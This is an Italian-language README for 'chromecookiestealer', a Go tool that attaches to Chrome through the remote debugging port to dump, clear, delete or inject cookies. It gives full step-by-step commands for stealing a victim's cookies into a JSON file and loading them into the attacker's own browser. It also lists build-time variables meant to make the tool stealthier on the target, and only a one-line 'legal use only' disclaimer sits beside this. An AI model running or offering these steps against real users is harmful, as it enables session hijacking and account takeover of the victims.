
Rubare/Iniettare i cookie di Chrome tramite il protocollo DevTools (--remote-debugging-port).
Si collega a Chrome utilizzando il suo protocollo Remote DevTools e ruba/inietta/cancella/elimina i cookie.
Fortemente ispirato da WhiteChocolateMacademiaNut.
I cookie vengono scaricati come oggetti JSON utilizzando il formato nativo di Chrome. Lo stesso formato viene utilizzato per i cookie da caricare.
Solo per uso legale.
Ruba i cookie di una vittima:
git clone https://github.com/magisterquis/chromecookiestealer.git
cd chromecookiestealer
go build
pkill Chrome
/Applications/Google\ Chrome.app/Contents/MacOS/Google\ Chrome --remote-debugging-port=9222 --restore-last-session # Varia in base al target
./chromecookiestealer -dump ./cookies.json
Inietta nel browser locale dell'attaccante:
# Avvia Chrome con una porta di debug, come sopra.
./chromecookiestealer -clear -inject ./cookies.json
Usage: chromecookiestealer [options]
Attaches to Chrome using the Remote DevTools Protocol (--remote-debugging-port)
and, in order and as requested:
- Dumps cookies
- Clears cookies
- Injects cookies
- Deletes selected cookies
Parameters for cookies to be deleted should be represented as an array of JSON
objects with the following string fields:
name - Name of the cookies to remove.
url - If specified, deletes all the cookies with the given name where domain
and path match provided URL.
domain - If specified, deletes only cookies with the exact domain.
path - If specified, deletes only cookies with the exact path.
Filenames may also be "-" for stdin/stdout.
Options:
-chrome URL
Chrome remote debugging URL (default "ws://127.0.0.1:9222")
-clear
Clear browser cookies
-delete file
Name of file containing parameters for cookies to delete
-dump file
Name of file to which to dump stolen cookies
-inject file
Name of file containing cookies to inject
-no-summary
Don't print a summary on exit
-verbose
Enable verbose logging
go build dovrebbe essere sufficiente. Le seguenti variabili possono essere impostate
in fase di compilazione con -ldflags '-X main.Foo=bar' per un maggiore furtività sul target.
Nessuna delle precedenti è impostata per impostazione predefinita.
Il Chrome DevTools Protocol è un bersaglio in movimento. Potrebbe essere necessario utilizzare una versione più recente delle librerie chromedp e cdproto qualora questo programma smettesse di funzionare. Questo può essere fatto con
go get -u -v all
go mod tidy
go build
che potrebbe avere l'effetto collaterale di rompere tutto il resto.
¯\_(ツ)_/¯
| Variabile | Descrizione |
|---|
| DumpFile | Nome di un file in cui scaricare i cookie. Implica -dump |
| InjectFile | Nome di un file da cui iniettare i cookie. Implica -inject |
| DeleteFile | Nome di un file con i parametri che descrivono i cookie da eliminare. Implica -delete |
| DoClear | Se impostato a qualsiasi valore, implica -clear |